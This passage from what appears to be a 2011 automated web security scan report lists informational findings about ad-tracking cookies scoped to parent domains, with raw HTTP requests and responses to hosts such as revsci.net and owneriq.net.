Set-Cookie: udm_0=MLv3NzMJZjpnHrwgn5OKIC8rjRkCYOhIvxMJqd1IRwcN114LmB1hUAo9AQIc2CCHUsGSvr68d9PUabSy8XykZXB/3l+HJH73OmlgZ4tiIxxd29qKVEBFtOHkIA69CBMvGklbIVYB0ACeEpxc1xsFm2BAOGetC5jxtgfiek+X/2FK/y9Pbu4V6nDlfqatTqQufnTHoZnUvbyhzvzoLjhkOZaG6fHVDlw77wXvw+fbrOmQCWEUkBfgcWmi/Zre1bmGyb7AGoGoCaiN9HPzQYgLw9WFU7LtfemAZqj0XBWia2dy1QDOQWH8Z+5L9lpl1fEaDfjx1nZF6AmT3WfTEJuoEkLbJoy2cLiPzJpAJZQjWiJPCORDCmEmHGzZFyQWahU2U1zs57DFXw3gD/iIS2UUnkP8UaJA5p/AFiW9trAtDRvxMrb8aCtC+AhrdUKtwuYsJyB8drLRtR7fkA+fNJKWw3ByqiFnMo3NPoVFfiZz+FKKdgiimCByqVJTKP4MU+v0+dfE+py/3A+D5rvkOkMk/3Z466oR26jTHWGfFoehWv74i6ioitgxAg/RSVmXioRB47xR0ikPU2um4sDrwT3VQJBJUU3pSvEdFuFQYUEla4XktcVxxF3o7ilLxqxROBHn3C8xQbdeyxfPY10leK5Ii4bvvVrvLxvVgHGfi+jxE8SRLCMsKFQkoIJDmwma8dGK+EXfwgIvZcZ/v6EdQQHvlSvBu9tlX86rhUvlOHosfPwwW1JCwtr7P4nZvbbtZL6Eqfj9ARWLPPbjjN3lsR4goJM7grCys2oYg4abb9/KqYUwLr3Tc5iUpOoK46uWE28v5hNG1oub9t7LLVMKD9E4+OQcWePEcj25kprN4LKFzmseXMl42ljLCnv3kmBKm783YNLdBEvwdITQj9yLi/eTYXCcGrJLYtrt3oieNpyaYRRYRDBfvg9EcqnRhBtnyj5HDVp3kPhLQCqoLPsuBslc7SgjbhhEaNc8nw1GcE835zwximZJ17a4tJtijwDHT6ZUvLdxqFH7Tm/XxMBqlpeXaL1B8CxIz0wyg6p6NEVYpxPrMsGPdrGsFB7BJzpL2eeEUW5Y+zGKdSEM+4lw06BXEqYVZeoSdutV9bSomgl593HXISI8QBs2LMohBcV0aGKUINJvO/WrxaqXB06uz8VF45FfqMEzlKUhAUkZRjXqHR+Ex4oNVEEy4BpjehToiDu8AuLUL1215rz6Fy3e0hK37n7uv7qzWRM0HB2mPnEFBGA/qkP/VhgjsbQIeLOWW6iSyfTjTXpYXFXYAkKqbUW67eq1vA89dONNMnxHxhj+UX2R0Fuofk2xpIzykCOmOI6+feKbU+rYcfNodXJBpIFDA3IJxDlYI3XStb5XBatWqL4lKsZFD2zEzSY88Cwmns0QYn/EH1DMQ0DF2uTf0pBiWXwujWi8leg/wnwXPA2goc/bg/637rNjz/smo/TqzuOsPXxFNLArjvVR7oiOWn6wJpiUp3hGTPMq+neb52yzfuNVMTglrNlwNpSx1vM5iOvojXVyJ4wyJjoUZMNusojEcUk2nAq62CtYFfuVbaWDQup3f6V1pSkWOcRkiwaLG9u5cDRnX8HqxerFU7M/C0wCVYUytNAem8HQrF5WZ+Saq5AwwnQt6WMhcydeU/kl4grLIgt7kUt4YiF7r0yhsHj5UAV3TeN+9ivAUEFlC29uj2NV9uJG4lgfoSo9595M2SK/x2MEZfSdAaZKGmkZ7CE9XhZL2fnhz3rTLP5Q0STw49XydtyAaeUgxKZm0pGR/yxosJMKWaWYSXBVAu75ZFB0HDM+7mYyYcBR2NySR3nFfohOz341Q5P5; Domain=.revsci.net; Expires=Wed, 13-Jun-2012 00:13:56 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:13:55 GMT
Content-Length: 743

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = ['D08734_72092','D08734_72131','D08734_72639','D08734_72674','D08734_72685','D08734_72764','D08734_72782','D08734_72765','D08734_72132'
...[SNIP]...
11.26. http://pix04.revsci.net/G07608/a4/0/0/pcx.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /G07608/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /G07608/a4/0/0/pcx.js?csid=G07608 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JSQLVVzDFCtpU+w6+pH+Y1T9p9LQR/PMkrcUsw+1QGXy+LDb2WDbWjI6teif4fufdjX0iW0zQ3r14JwP/YaUQ4WilEZa1mTBgWbOLLoFHNs08LFTYabwcAaYOpnwILBLA0IVDPkmyj9OMIYKQd6IFV/U7eaOKVpIVUuoozuLsep7zskREZWlB8DC0Z6ZhAC9GNAaNN9SIPSSgIVwuLxxEDWGHmNvQReIPgONCKGbppyUb0MuDFLaVEB21tuA5eB0TwJEppny+pG7rWJSzu9wMWQAYB9UcEa+6Ot/GEdiBGBeZUz/PNWWpTFE5/VfQqv/UGRYazwgPLRpZV2N6R6V5RxGDtwcd0Kg+3xcyiKWsowuExSbhU6VEf7YyiTHaC/du9ddBfScpk1DTJwr8ORBVQshQVh3o+bELFMMFPcKJo85b+qpouTCGevSDP7mo2pY/E0fe1hI4sMnItTGq0az0BD+ZishUixzzbsiOwtQJOi2Ee8JJzVGdoZ61EKoghYOLhDc5eklez24xev7qKS9F7h1mC2RVCY2nxpOwc7SjqXGg/OCww4zaM9AMXFFE49FubdJ0St6r/fWqY7+kfyrhBgu+HSt4ihuLEBSkT05sHLFw5XrC1OeG2PPUrvuBk4AiZTFx38TRLswQ; rtc_AVou=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; rsiPus_NgLQ="MLsXtSUNJghnJ5E4m+qiOkhRwa7hUABMuZFInYmOU5CwyKrbszV5vmL8lWFj4llhxoQ3e1svCK92teQAGGpiXNNk5yhz0k6qMqepXctaemT1zUx64bqPVEDRu9imGo7Ebp2/fQojqVeFKRFF0SA4XwrjqmzDguHf3CyYsCjA09uTjSVJnoABAKJ060se1uo9aNjODvhDz1mbxjhn5k7S8kYNpVefcRkN0ezUbx4yXrKIfKXBpe8haW3Ezn+fg2+3yM7NzmkTlMJi3h2vEpw2B1Hwk/EoJir1a+frRQzq6BVY6++af6bNc9Gsel8szxe1MEEOovznC7OhxhCjQdnq9GL2yO7hYb+lryyzSBqtzIsro8Q+vfYkWgu6ScgTQgC8rvB1avsYeRGbFUvlIBBPOVTIgr31bZqzx0YcEN/qxv7tUWnYbT5qVI+mTiaeGzlurVYN4XcoTRK1iNhTaJGI9W3AcFxFgaLRHmcTh1xT5gRasLrNXoA7Yx36PKLO9qyEORWS8V+HKIP7KaQ0pYzzdT5VgCASQfBKiAp9Fx+vFry0uXdpmrgqwTKnQLh7EZud9NBB/tN7g4znELnLPgvwmOjVzMqdsluxw+PVxnHGpjJUy7CDJHju5PrhQYxgPzNBPg3XFE/IM8qxo9L8puKY63wUo1IJ34Bn2a3nPg99evpS3an0NjrEl9Lc8eMnPE97GKKtUAyp2BuzowKyN27UlRbyJ5kGO3taUNqu6LW7uuqNCi0auOQZpu93nkAwml8uw2P9zb+COGgVslqjvCqSLr4/hmETdV18EdqPJGoaOi0cnIT53ZC8YWsLbo3I5fBfvK+GxL5FQzqNBAvrhd5ETvk1RGVHPXX2KivKpgx2qbmaxEk26/0Bt9MCsofNUzBZcs4u17Jw7uu+hBTQ/vodZwbRVE0IV7cW+IRp8e65d9GvPVtbKW2iTDk7y5SxdiaJwgJGsVy5JNLgCv29A+BcG8QQFfshYztQVOhRMaXaLe3dcTg89YyUsbOH3GLMunfPyJtnAE9twjS4ZETuZV7awzx1MosM9q10mCc7wakiOxmYN/2lABAgiKXTzFfAwRzlIszYo6qtMwxJyltYn5qwTqvsLUVMklnjRTTDaod8z+TJuskM7y5mYJ9g5+jCrycFbRPpz7CBO/LzNfQxdOfAI3jLsj864lYcT9UI8a37SUrkU/0r7LyWYt9OGzcBvfZFprBRDH5kOeRCthtPFYWt0Rq6CT5CJT2H2svpkYiDMElia8cpDenaTXrVDzWjSU7CQjBru+DfQcMKHFRifQkiX+oS605HKn8AoAltf7tLRSZiOPCJMSdTvKumo9b3yOl6m30kP9qk"; rsi_us_1000000="pUMVIymnMBYY1A2AKVvIIuTBYTPKGKPeIlBjyVgbdZ29J76lIs/596g4gx56aSaUsZrP5kX0UekwLOgm90iPjD6R7o+WvDarELVc7RvdZ/T8x+dO+pdp/M4NeSFpZyEYS0O5hZpRcgjiqRjPjPMhDzn7qzSB5uGosGXOa1cwsHj5LNpFUOkdNazF1aDMTcpRZgNkLEY0wjS13tB3wtTOwfoZEQeeSALCIxbuvpHf3bx7mpsCYE02t4xzT5o9NKtvRMEVcfmJjc3/rHMJeDZjB86qQ4ocpYJanK6/Pqe5M++RPnRI6rsGSTSGOB6mSjo0G8NySzn8fumcLKrpCiOQiDYzIw4tbpGFRagp7cQ8VrvHvcVF2ZgBlwZfzy7L0brB9FTXEVeq85mz+ogNOZIpJeiMnvSJLazSGQtFqnBB4XI/dwG2Z2uDnBWI3dlO+qH9FOrWtOOI6v5o0c0TJMT5pGN2v3qnTrcXJvj7hyx+xL2yakmSWpVGywJp8KIUsi2WHeHHBQlgbHBDdmeC7bSsrQzMXvpaG+GBmFQ7QWOerx/xPuGjnEX7NNLSjzTjQLa+Ut7G+6DqE2jShJj/S6XlMCOZSfM9h+VEkH8+l0U0mKM5OK6ZlCAAKli/8grUHMZTQX4Bv6NOwfVnSOoUDG9JQX7uCDFLJNLVnkeCqup6fmOfmkomA2x/O3FB3QzU3xukWlM5u27FFyaYYnHtTkWARy8KeZ2JI3HiIbUfGCqZlp7Umjr0tqF1EXy/4/cjQ7n30Q8RGyC7P8hum2/tg3W3PhZXZpbLCUDphbywIgfBw8y6pMNc8BRAzl+0he/c1XF+0PQbflFiYFcXeGlnLw4Uwwvyhs/awd9sbMrsKRrVmJSzqNZmh0x5x0hVAWhvDCA6BQ8ZqURZOCjqiH855mK3sqrup8s9L575P6sOzyWxELCikSVQoeM6sR58ndOBRS2lG46Udf6M1JW4mZIFb/h5C4ZNCPsIV2mwp0R+xi0lSfmOSsobQut40tp2Td+svCzYt0y0+JotrL/193pAwAiyhfQ6O6CbHt0wF9h/DatbZ942q9SlD0Rmp9LU0ituiKtAnHfE5Onmr4vZpF8JulVfqOLUqaFJG6D9bfluIAfjJWTaPLtmQ3nG0HYMCIHlkOXG8M2Apa4lt5kLhvqhHjOaujZ3caw3GulwzzB95gN0PPH+YO/t7+bpXWE/JxC5NHN/PsidSh/4NMrrF6EfE9PjSOG6CO/Ck16C8OgG3I2l4aNEKz/AfAMb+obO8kko4u4n6XIAJhHFYMuO/zI8b2HyrM6QI0IL3nAmdxTLlf57zuGQSM+8GcRUaj9OMjdon5/TNQ+OW6oLUfodUGlXKTd8fPvkwo/3WbFcYAU6zWvBclL+/+bijDJqLIvaSaGZw/SIdawITb8khSgiQg4gzLk6nH+V1Hi2Q5XfnUDHftS51DCB/xZfAiQT2L24vMLep03CqjBA8NaAfyOmbAIa23LFACO6MJodJa3wiL8YVEo8ou3JMy3dGISGYik2x6fpsR/JNgqwJZSWVhCGB/bgJlpqYwaDB9VJOIImd95OXOiJdmw3VNVl33VouiAKJsBA/9zqU1FROc+iuYSn7hEK52PNFlNbLi8B3ORlodnhdCnixoikKCk9HQwBMAiV8W3BlMXW+lwpxJ4+Dvx1r3qomwkcET6PP16XX1ENsX32kpDWRJkMTNdlK6kqI6Y1a1dLfYCKNHUI+tEzMJ3YgRjYfzoV2sM8kQdnC6LkryLgBgAL4TF/43o="; udm_0=MLv3NzMJZjpn3hc5wFS813Gq21JyKlW/a0G0nU4qYXQr8bdIXllY4qSUGIMEVAYaUgmC7BE5rePyXCMhVeRUU77T0dB9laIjEG35bFZpiOLnlDdGTCFCQ0MEWZAmxumVjM+JUKi+lr0ZvsuCzJ6ckWKgM2OtiqD9UBfi+1+FEbO8SDIdRmUE/QHYAgD0BRAO1vqZsK3phnIHHJc9evRe+Zfm+Tk9uXoXINe9b7K4da4fOMFUkAPmcPkL7oUaiZo+zB3Vj59wmDAcZ+i2pP4y+DrGqQJ4422c4ku2MADSnGtyPVKqSIE7YSF35LTPZC1VtpFy8XSScJqe95WonH1o68US3zi9TlUL1DNZvOs54PKugt2D7oYeeUu7cPgxIPzPqQwTDLydgTDcNm+ud0e7udev/5FrU83+5sQHzARSPJV7BjZXMBYHVdPbXLgcpffXV5dy1h2qu7Y5BpTLpTJJMmQ4SyB3qE8rx9AmmTztdIVlW8Poy8G+Jw7xdO0qUFnOCnhJsEBVmvGOzwiKUOu8BrV1+IuW4C84KLuX6i0WQ1ychZvQsd4jYItN2ZaEmmxiPO0VHSP5+SV4NdIO7GjdrX8Wjli9o9x2guE1IXcQeTWhagmrxIa06M/Z9l8dBAw4gq+6XA6+SY81NzRWcSUTLp8d+rVmr8Q6zk1rmt09KMagZqQCpbQ4k3s+o2od1gaGpWkloOFCGaZnSA8FSQWGAcJQnRZtvsutuSsjPWXdjlClDyc26akmSJWi4grlIoaln+T0KcrxT0vPTcsBzR850hurWA1Yh/I/iJkOxptQVO2kiTwRzLru9N9oUQcTstfIMixT81uc5LjQeaidpT8vosi50NFzFVe3np8GQ4ZVAtGu6yCbMOOOi7enK8M2jI/3fdLFdMdOvS+435aVR3rkIhaRwfqwpPfSE/mXu49uTvBZRThdPnBAOjIIneapPU7sFczKownb1tWafVIW8R+SWBn+voW5C3J5TpPU5G8xTLlF6FaV5tvfGFCI458ex/CF7jdGelRCRZ0e67MDdJ3LlY7UAL8ma79sqd5DVX5GFejXCKA8BWvclbbbz2o/GN8a8Ksbd+IantFxPMDktxOajsinEElt0gXuHjkddFCGHA+cuYgde334avcjMiASDvS3ZM4RlSx9AGNKeXia/234gPT82RqePnu/Ghyp7AVar05f+HZOAElWzhGVDPGVEabC8S/EAoH+AhbGAm3gVc0bPXMqB85SpC3V5UAdKvSEPlJYC7ocx6qjeR6fk/Wbocy3PdIL58T4enH5STFqqujhseNSRnr2A+9+VO4sBOmJrHkP3OSBI5SPfECBEljsr3rfMc1HPYx2zhL4Vv/gTUDeirzONRGZT1+7lfWIpyc+j895bCkM73Cpb0YCQQvdWkhv3iYz+3u8faBHBbkKadQA0zyPzHtH63Xd9V6rfMsX7p4xMLpHFchX0M4jKIgrUfwlyFLPQMYB3mvM3iVmFzcF9L2inBeyWU9lsZI7tC65pTsyPVhf1NtNZdkMxZfskrgwDSwSwgPuupX5TgeJ8P4iT+8kman5SI0blgwfdfOt8qllPzU8IfZ1jznx90RMcWoObdvHaDszOUZ7lEpW3QM3NFGmaww8XOLnsgThSCe7MwZB82c47TUqLuCKeqtb9LJTycXnybjNiLQZPdyglSFanHImIgvH/lblsrhDMnzK5UBRVpQoFyMq6iW6N9ChO+FiCV/rKjWGAgmX5i9nMlPi22HA5ag1AMV8meFAWwnyjGSy69Cp

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JSQLVVzDFCtpU+w6+pH+Y1T9p9LQR/PMkrcUsw+1QGXy+LDb2WDbWjI6teif4fufdjX0iW0zQ3r14JwP/YaUQ4WilEZa1mTBgWbOLLoFHNs08LFTYabwcAaYOpnwILBLA0IVDPkmyj9OMIYKQd6IFV/U7eaOKVpIVUuoozuLsep7zskREZWlB8DC0Z6ZhAC9GNAaNN9SIPSSgIVwuLxxEDWGHmNvQReIPgONCKGbppyUb0MuDFLaVEB21tuA5eB0TwJEppny+pG7rWJSzu9wMWQAYB9UcEa+6Ot/GEdiBGBeZUz/PNWWpTFE5/VfQqv/UGRYazwgPLRpZV2N6R6V5RxGDtwcd0Kg+3xcyiKWsowuExSbhU6VEf7YyiTHaC/du9ddBfScpk1DTJwr8ORBVQshQVh3o+bELFMMFPcKJo85b+qpouTCGevSDP2NA44HumkHp4sxPiq7xWC7/Y18Cw1YHMTLmGU0sq3aJetGtkv45Wol0tdvAh/b6SngNrsnWV9CEMk+xEkfM0nen61A/5z+1R9Olfwa/+uGCb9KGCWYT8JqLUEQcwjhy6MqcGqTVnRoKesTa1naELxWNlZl+r+hZigxeGhWsNKi7RyenIZrasb0i+THLaSjlsB4UnTg7aueb3MJbisx+; Domain=.revsci.net; Expires=Wed, 13-Jun-2012 00:13:55 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:13:54 GMT
Content-Length: 941

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
var rsinetsegs=['G07608_10004','G07608_10009','G07608_10016','G07608_10017','G07608_10001'];
var rsicsl="lDlIlPlQlA";
var rsiExp=new Date((new Date(
...[SNIP]...
11.27. http://px.owneriq.net/ep  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://px.owneriq.net
Path:   /ep

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ep?sid%5B%5D=133789898&sid%5B%5D=133443903&sid%5B%5D=133663613&rid%5B%5D=1203653&rid%5B%5D=1203654&rid%5B%5D=1203953 HTTP/1.1
Host: px.owneriq.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3106981;type=forex803;cat=forex519;ord=1;num=1308052950?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: si=3589157951140485318; gguuid=CAESECRt4BlvfnFjSL7l7K77jrU; oxuuid=7bbcd01e-f726-4eb0-8371-0cfa1038e6ef; ss=uxrmw.12sfs0.12sj04.uxrmh.12sfs5.12sizp.uxrmm.nqhjy.12sfsa.12sizu.uxrmr.njtv7.12sfsf.12sizz; apq=.; rpq=.

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.15 (Fedora)
Content-Length: 153
Content-Type: text/html
Location: http://ib.adnxs.com/pxj?bidder=13&seg=49740&action=as(133789898);as(133443903);as(133663613);&redir=http%3a%2f%2fad.yieldmanager.com%2fpixel%3fadv%3d95413%26t%3d2%26id%3d1203653%26id%3d1203654%26id%3d1203953
Set-Cookie: ss=27g5z3.uxrmw.12sfs0.12sj04.uxrmh.12sfs5.12sizp.27kvi5.uxrmm.nqhjy.12sfsa.12sizu.27nky2.uxrmr.njtv7.12sfsf.12sizz; expires=Sun, 12 Jun 2016 12:02:41 GMT; path=/; domain=.owneriq.net
Set-Cookie: apq=.; expires=Sun, 12 Jun 2016 12:02:41 GMT; path=/; domain=.owneriq.net
Set-Cookie: rpq=.; expires=Sun, 12 Jun 2016 12:02:41 GMT; path=/; domain=.owneriq.net
X-Powered-By: PHP/5.2.13
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Cache-Control: max-age=20498
Date: Tue, 14 Jun 2011 12:02:41 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>
11.28. http://stgapi.choicestream.com/instr/csanywhere.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stgapi.choicestream.com
Path:   /instr/csanywhere.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /instr/csanywhere.js HTTP/1.1
Host: stgapi.choicestream.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: CSAnywhere=0b0f2d25-87ef-4be4-8d6e-adf8f861c5b6

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-CS-Request-Id: 416b7a85-3459-413f-9abb-9ac5225a9955
P3P: policyref="http://www.choicestream.com/w3c/p3p.xml",CP="NOI DSP COR NID ADMa DEVa PSAo PSDo OUR STP"
ETag: W/"84353-1300364150000"
Last-Modified: Thu, 17 Mar 2011 12:15:50 GMT
Content-Type: text/javascript
ntCoent-Length: 84353
Cache-Control: private
Content-Length: 84353
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 17:45:46 GMT
Connection: close
Set-Cookie: CSAnywhere=0b0f2d25-87ef-4be4-8d6e-adf8f861c5b6; Domain=.choicestream.com; Expires=Tue, 12-Jun-2012 17:45:46 GMT; Path=/

/*
* Copyright (c) 2000-2011 ChoiceStream, Inc. All Rights Reserved
*/
(function(){if(window.jQuery){var _jQuery=window.jQuery}var jQuery=window.jQuery=function(selector,context){return new jQuery.
...[SNIP]...
11.29. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s21898508197627  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s21898508197627

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

